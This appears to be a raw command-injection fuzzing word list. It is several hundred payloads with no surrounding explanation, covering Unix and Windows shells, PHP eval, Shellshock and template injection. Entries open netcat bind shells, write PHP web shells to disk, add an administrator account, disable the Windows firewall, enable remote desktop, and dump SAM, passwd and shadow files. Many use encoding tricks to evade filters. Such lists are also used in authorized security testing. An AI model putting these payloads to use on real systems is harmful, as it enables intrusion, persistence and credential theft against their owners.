 %0A id
 {${phpinfo()}}
 {${sleep(20)}}
 {${sleep(3)}}
 {${sleep(hexdec(dechex(20)))}} 
"
" & whoami
" && whoami
" whoami
" | whoami
" || whoami
"'
"; whoami
"w"h"o"a"m"i
$(`cat /etc/passwd`)
$(`dir`)
$(`ls`)
$(`type C:\boot.ini`)
$(`whoami`)
$(a="WhOaMi";printf %s "${a,,}")
$(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73")
$(ls)
$(printf %.1s "$PWD")bin$(printf %.1s "$PWD")ls
$(rev<<<'imaohw')
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
$;/usr/bin/id
${@print("RCEVulnerable")}
${@print(system($_SERVER['HTTP_USER_AGENT']))}
%0A sleep 10
%0A/usr/bin/id
%0A/usr/bin/id%0A
%0Acat%20/etc/passwd
%0Aid
%0Aid%0A
%0a
%0a id %0a
%0a ping -i 30 127.0.0.1 %0a
%0a%0d
%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1`
%20$(sleep%2050)
%20'sleep%2050'
%20{${phpinfo()}}
%20{${sleep(20)}}
%20{${sleep(3)}}
&
& 
& dir
& dir C:\
& dir C:\Documents and Settings\*
& dir C:\Users
& id
& ifconfig
& ipconfig /all
& ls -l /
& ls -l /etc/
& ls -l /home/*
& ls -l /tmp
& ls -l /var/www/*
& ls -laR /etc
& ls -laR /var/www
& nc -lvvp 4444 -e /bin/sh&
& net localgroup Administrators hacker /ADD
& net user hacker Password1 /ADD
& net view
& netsh firewall set opmode disable
& netstat -an
& perl -e 'print "X"x16096'
& perl -e 'print "X"x2048'
& perl -e 'print "X"x4096'
& phpinfo()
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
& pwd
& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
& sleep 1
& sleep 10 
& sleep 15 
& sleep 5
& sysinfo
& system('sleep 5');
& systeminfo
& type %SYSTEMROOT%\repair\SAM
& type %SYSTEMROOT%\repair\SYSTEM
& type C:\WINNT\repair\SAM
& type C:\Windows\repair\SAM
& type C:\Windows\repair\SYSTEM
& uname -a
& whoami
&& 
&& dir
&& dir C:\
&& dir C:\Documents and Settings\*
&& dir C:\Users
&& echo "<?php include($_GET['page']); ?>" > rfi.php
&& echo "<?php system($_GET['cmd']); ?>" > cmd.php
&& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php 
&& ifconfig
&& ipconfig /all
&& ls -l /
&& ls -l /etc/
&& ls -l /home/*
&& ls -l /tmp
&& ls -l /var/www/*
&& ls -laR /etc
&& ls -laR /var/www
&& nc -lvvp 4444 -e /bin/sh &
&& net localgroup Administrators hacker /ADD
&& net user hacker Password1 /ADD
&& net view
&& netsh firewall set opmode disable
&& netstat -an
&& perl -e 'print "X"x16096'
&& perl -e 'print "X"x2048'
&& perl -e 'print "X"x4096'
&& perl -e 'print "X"x8096'
&& phpinfo()
&& pwd
&& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
&& sleep 1
&& sleep 10
&& sleep 15
&& sleep 5
&& sysinfo
&& system('sleep 5');
&& systeminfo
&& type %SYSTEMROOT%\repair\SAM
&& type %SYSTEMROOT%\repair\SYSTEM
&& type C:\WINNT\repair\SAM
&& type C:\Windows\repair\SAM
&& type C:\Windows\repair\SYSTEM
&& uname -a
&& whoami
&&dir
&&id
&&type C:\\boot.ini
&id
'
' & whoami
' && whoami
' whoami
' || whoami
'"
'; whoami
';phpinfo();//
() { :;}; /bin/bash -c "\`grep root /etc/shadow\`"
() { :;}; /bin/bash -c "\`nc -lvvp 1234 -e /bin/bash\`"
() { :;}; /bin/bash -c "\`nc -lvvp 1236 -e /bin/bash &\`"
() { :;}; /bin/bash -c "\`pwd\`"
() { :;}; /bin/bash -c "\`uname -a\`"
() { :;}; /bin/bash -c "\`whoami\`"
() { :;}; /bin/bash -c "sleep 5 && echo vulnerable 1"
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5`
/\b\i\n/////s\h
/index.html|id|
127.0.0.1 %0A ls
1;sleep${IFS}9;
:phpversion();
; 
; dir
; dir C:\
; dir C:\Documents and Settings\*
; dir C:\Users
; id
; ifconfig
; ipconfig /all
; ls -l /
; ls -l /etc/
; ls -l /home/*
; ls -l /tmp
; ls -l /var/www/*
; ls -laR /etc
; ls -laR /var/www
; nc -lvvp 4444 -e /bin/sh;
; net localgroup Administrators hacker /ADD
; net user hacker Password1 /ADD
; net view
; netsh firewall set opmode disable
; netstat -an
; perl -e 'print "X"x16096'
; perl -e 'print "X"x2048'
; perl -e 'print "X"x4096'
; perl -e 'print "X"x8096'
; ping 127.0.0.1 ;
; pwd
; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
; sleep 5
; sysinfo
; system('sleep 5');
; systeminfo
; type %SYSTEMROOT%\repair\SAM
; type %SYSTEMROOT%\repair\SYSTEM
; type C:\WINNT\repair\SAM
; type C:\Windows\repair\SAM
; type C:\Windows\repair\SYSTEM
; uname -a
; whoami
;${@print(md5(RCEVulnerable))};
;/usr/bin/id\n
;/usr/bin/id|
;echo '<script>alert(1)</script>'
;echo 111111
;echo%20'<script>alert(1)</script>'
;id
;id;
;id\n
;id|
;ls -la
;netstat -a;
;phpinfo()
;phpinfo();//
;system('/usr/bin/id')
;system('cat%20/etc/passwd')
;system('id')
;uname;
;{$_GET["cmd"]}
;|/usr/bin/id|
IFS=,;`cat<<<cat,/etc/passwd`
IFS=];b=cat]/etc/passwd;$b
X=$'cat\x20/etc/passwd'&&$X
\n
\n/bin/ls -al\n
\n/usr/bin/id;
\n/usr/bin/id\n
\n/usr/bin/id|
\n\033[2curl \`whoami\`
\n\033[2wget \`whoami\`
\nid;
\nid\n
\nid|
\nnetstat -a%\n
\r
\r\n
\u\n\a\m\e \-\a
`
`/usr/bin/id`
`dir`
`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
`echo -e "\x63\x61\x74\x20\x2F\x65\x74\x63\x2F\x70\x61\x73\x73\x77\x64"`
`id`
`ls`
`perl -e 'print ".%p" x 80'`%n
`ping 127.0.0.1`
a);/usr/bin/id
a);/usr/bin/id;
a);/usr/bin/id|
a);id
a);id;
a);id|
a)|/usr/bin/id
a)|/usr/bin/id;
a)|id
a)|id;
a;/usr/bin/id
a;/usr/bin/id;
a;/usr/bin/id|
a;id
a;id;
a;id\n
a;id|
abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat abc
a|/usr/bin/id
a|id
a|id|
bash<<<$(base64 -d<<<d2hvYW1p)
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
cat ${HOME:0:1}etc${HOME:0:1}passwd
cat /etc/hosts
cat /etc/passwd
cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
cat `xxd -r -p <<< 2f6574632f706173737764`
cat `xxd -r -ps <(echo 2f6574632f706173737764)`
cat$IFS/etc/passwd
cat$u /etc$u/passwd$u
cat${IFS}/etc/passwd
dir
dir C:\
dir C:\Documents and Settings\*
dir C:\Users
ech""o test
ech''o test
echo "ls\x09-l" | bash
echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
echo whoami|$0
echo${IFS}test
eval('ls')
eval('pwd')
eval('pwd');
eval('sleep 5')
eval('sleep 5');
eval('whoami')
eval('whoami');
exec('ls')
exec('pwd')
exec('pwd');
exec('sleep 5')
exec('sleep 5');
exec('whoami')
exec('whoami');
id%00
id%00|
ifconfig
ipconfig
ipconfig /all
ls
ls %0A id
ls & id
ls && id
ls &&id;
ls &id;
ls -l /
ls -l /etc/
ls -l /home/*
ls -l /tmp
ls -l /var/www/*
ls -lh /etc/
ls | id
ls |id;
ls || id
ls ||id;
ls${LS_COLORS:10:1}${IFS}id
ls& id;
ls&& id;
ls&&id;
ls&id;
ls; id
ls| id;
ls|id;
ls|| id;
ls||id;
nc -lvvp 4444 -e /bin/sh
nc -lvvp 4445 -e /bin/sh &
nc -lvvp 4446 -e /bin/sh|
nc -lvvp 4447 -e /bin/sh;
nc -lvvp 4448 -e /bin/sh&
net localgroup Administrators hacker /ADD
net user hacker Password1 /ADD
net view
netsh firewall set opmode disable
netstat
netstat -an
p$(u)i$(u)n$(u)g 127.0.0.1
p${u}i${u}n${u}g 127.0.0.1
perl -e 'print "X"x1024'
perl -e 'print "X"x16384'
perl -e 'print "X"x2048'
perl -e 'print "X"x4096'
perl -e 'print "X"x8192'
perl -e 'print "X"x81920'
phpinfo()
phpinfo();
pwd
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
route
sleep 1
sleep 10
sleep 5
sysinfo
system('ls')
system('pwd')
system('pwd');
system('sleep 5')
system('sleep 5');
system('whoami')
system('whoami');
systeminfo
test* & perl -e 'print "X"x16096'
test* && perl -e 'print "X"x16096'
test* | perl -e 'print "X"x16096'
test* || perl -e 'print "X"x16096'
test*; ls -lhtR /var/www/
test*; perl -e 'print "X"x16096'
time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
type %SYSTEMROOT%\repair\SAM
type %SYSTEMROOT%\repair\SYSTEM
type C:\WINNT\repair\SAM
type C:\WINNT\repair\SYSTEM
type C:\Windows\repair\SAM
type C:\Windows\repair\SYSTEM
uname
uname -a
uname!-1\-a
w`u`h`u`o`u`a`u`m`u`i
which curl
which gcc
which nc
which netcat
which perl
which python
which wget
while read -r line; do echo $line; done < /etc/passwd
whoami
xxd -r -ps <(echo 2f6574632f706173737764)
{${phpinfo()}}
{${sleep(10)}}
{${sleep(20)}}
{${sleep(3)}}
{${sleep(hexdec(dechex(20)))}} 
{% For c in [1,2,3]%} {{c, c, c}} {% endfor%}
{1} + {1}
{cat,lol.txt}
{echo,test}
{{ get_user_file("/etc/hosts") }}
{{ get_user_file("/etc/passwd") }}
{{ get_user_file("C:\boot.ini") }}
{{4+4}}
{{4+8}}
{{[] .__ Class __.__ base __.__ subclasses __ ()}}
{{person.name}}
{{person.secret}}
| 
| dir
| dir C:\
| dir C:\Documents and Settings\*
| dir C:\Users
| id
| ifconfig
| ipconfig /all
| ls -l /
| ls -l /etc/
| ls -l /home/*
| ls -l /tmp
| ls -l /var/www/*
| ls -laR /etc
| ls -laR /var/www
| nc -lvvp 4444 -e /bin/sh|
| net localgroup Administrators hacker /ADD
| net user hacker Password1 /ADD
| net view
| netsh firewall set opmode disable
| netstat -an
| perl -e 'print "X"x16096'
| perl -e 'print "X"x4096'
| perl -e 'print "X"x8096'
| phpinfo()
| pwd
| reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
| sleep 1
| sleep 10
| sleep 15
| sleep 5
| sysinfo
| system('sleep 5');
| systeminfo
| type %SYSTEMROOT%\repair\SAM
| type %SYSTEMROOT%\repair\SYSTEM
| type C:\WINNT\repair\SAM
| type C:\Windows\repair\SAM
| type C:\Windows\repair\SYSTEM
| uname -a
| whoami
|/bin/ls -al
|/usr/bin/id
|/usr/bin/id|
|id
|id;
|id|
|ls
|ls -la
|nid\n
|usr/bin/id\n
||
|| 
|| perl -e 'print "X"x16096'
|| perl -e 'print "X"x4096'
|| perl -e 'print "X"x8096'
|| phpinfo()
|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
|| sleep 10
|| sleep 15
|| system('sleep 5');
||/usr/bin/id;
||/usr/bin/id|